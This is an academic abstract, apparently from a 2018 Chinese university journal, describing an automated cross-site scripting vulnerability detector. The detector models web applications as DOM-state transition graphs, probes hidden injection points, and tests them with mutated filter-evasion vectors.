To　improve　the　hidden　injection　point　scanning　coverage　of　cross　site　scripting(XSS)　vulnerability　detection　and　effectively　determine　whether　there　is　XSS　vulnerability　attacks,　a　method　was　proposed　to　construct　the　Web　state　transition　graph　of　the　Web　application,　and　to　search　the　XSS　vulnerability　injection　point　during　the　construction　of　the　graph.　The　document　object　model(DOM)　state　was　used　as　the　node,　and　the　browser　event　as　the　edge　to　model　the　Web　application　and　identify　the　hidden　injection　point.　In　the　meanwhile,　Web　page　analysis　was　combined　with　agent　technology　to　enhance　the　judgment　accuracy　of　the　injection　point.　Firstly,　the　presence　of　the　Web　page　was　analyzed　with　the　reference　uniform　resource　locator(URL)　and　Form.　Then,　the　Web　page＇s　element　of　the　browser　event　was　triggered　to　detect　whether　it　contained　the　relevant　data　request,　and　to　determine　whether　the　Web　page　had　a　suspected　vulnerability　injection　point.　Thirdly,　the　suspected　injection　point　was　tested　by　using　the　probe　vector　technique.　According　to　the　output　position　of　the　probe　vector,　the　injection　point　was　classified　and　saved.　In　order　to　effectively　determine　whether　there　existed　XSS　vulnerability　attack　in　the　injection　point,　XSS　Filter　Evasion　Cheat　Sheet　was　transformed　based　on　mutation　operation　and　filtering　escape　technique.　The　attack　vector　with　higher　success　rate　was　designed　and　classified　according　to　the　different　response　position.　According　to　the　different　response　location,　the　attack　vector,　the　injection　point　and　the　injection　attack　result　were　classified,　and　different　response　result　methods　were　designed　to　analyze　whether　there　was　XSS　vulnerability.　Finally,　based　on　the　above　method,　the　XSS　vulnerability　detection　system　was　designed　and　implemented,　and　the　experimental　comparison　was　carried　out　to　verify　its　effectiveness.　©　2018,　Editorial　Department　of　Journal　of　Beijing　University　of　Technology.　All　right　reserved.